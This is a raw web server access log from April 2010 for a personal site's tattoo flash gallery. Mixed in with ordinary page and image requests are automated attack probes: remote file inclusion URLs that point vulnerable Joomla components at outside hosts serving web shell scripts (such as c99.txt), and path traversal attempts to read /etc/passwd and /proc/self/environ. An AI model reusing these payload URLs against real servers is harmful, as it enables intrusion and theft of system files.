209.216.43.133 - - [15/Apr/2010:21:52:25 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
189.46.174.62 - - [15/Apr/2010:21:55:52 -0500] "GET /logshttp://www.idasy.com/c99.txt? HTTP/1.1" 404 316 "-""-"
189.46.174.62 - - [15/Apr/2010:21:56:00 -0500] "GET /logshttp://www.idasy.com/c99.txt? HTTP/1.1" 404 316 "-""-"
189.46.174.62 - - [15/Apr/2010:21:56:05 -0500] "GET /logshttp://www.idasy.com/c99.txt? HTTP/1.1" 404 316 "-""-"
82.102.6.110 - - [15/Apr/2010:21:56:05 -0500] "GET /logs/access_log.1268611200%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:21:56:05 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:21:56:05 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:21:56:06 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:21:56:06 -0500] "GET /logs/access_log.1265760000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:21:56:06 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
189.46.174.62 - - [15/Apr/2010:21:56:10 -0500] "GET /logshttp://www.idasy.com/c99.txt? HTTP/1.1" 404 316 "-""-"
209.216.43.133 - - [15/Apr/2010:21:56:14 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1006 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:21:56:14 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 200 1956 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:21:56:14 -0500] "GET /logs/access_log.1265760000/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
189.46.174.62 - - [15/Apr/2010:21:56:15 -0500] "GET /logshttp://www.idasy.com/c99.txt? HTTP/1.1" 404 316 "-""-"
187.10.33.193 - - [15/Apr/2010:21:56:16 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../etc/passwd%00 HTTP/1.1" 404 327 "-""Mozilla/3.0 (compatible; Indy Library)"
189.46.174.62 - - [15/Apr/2010:21:56:20 -0500] "GET /logshttp://www.idasy.com/c99.txt? HTTP/1.1" 404 316 "-""-"
189.46.174.62 - - [15/Apr/2010:21:56:24 -0500] "GET /logshttp://www.idasy.com/c99.txt? HTTP/1.1" 404 316 "-""-"
209.216.43.133 - - [15/Apr/2010:21:56:29 -0500] "GET /logs/access_log.1244073600/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:21:56:30 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:21:56:30 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:21:56:30 -0500] "GET /logs/access_log.1268611200%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
209.216.43.133 - - [15/Apr/2010:21:56:31 -0500] "GET /logs/access_log.1244073600/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
70.56.86.77 - - [15/Apr/2010:21:56:31 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.bing.com/search?q=vintage+tattoo+flash&go=&form=QBRE&qs=n&sk=""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:31 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
84.250.141.76 - - [15/Apr/2010:21:56:33 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
70.56.86.77 - - [15/Apr/2010:21:56:33 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
82.102.6.110 - - [15/Apr/2010:21:56:34 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:21:56:34 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
82.102.6.110 - - [15/Apr/2010:21:56:34 -0500] "GET /logs/access_log.1268611200%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
70.56.86.77 - - [15/Apr/2010:21:56:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop/5.9.909.30391; http://desktop.google.com/)"
84.250.141.76 - - [15/Apr/2010:21:56:34 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
70.56.86.77 - - [15/Apr/2010:21:56:39 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:39 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:39 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:39 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:39 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:39 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:39 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:39 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:39 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:40 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:40 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:40 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
116.122.36.61 - - [15/Apr/2010:21:56:43 -0500] "GET /logs/access_log.1220054400//components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
70.56.86.77 - - [15/Apr/2010:21:56:48 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:49 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:49 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:49 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:49 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:49 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:49 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:49 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:49 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:49 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:56:50 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:01 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:01 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:01 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:01 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:01 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:01 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:01 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:02 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:02 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:02 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:02 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
209.216.43.133 - - [15/Apr/2010:21:57:08 -0500] "GET /logs/access_log.1244073600/////?_SERVER[DOCUMENT_ROOT]=http://www.kumcalb.org//g4/bbs/img/ld1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
70.56.86.77 - - [15/Apr/2010:21:57:14 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:15 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:15 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:15 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:15 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:15 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:15 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:15 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:15 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:15 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:15 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:21 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:21 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:21 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
70.56.86.77 - - [15/Apr/2010:21:57:21 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729; Qwest 1.0)"
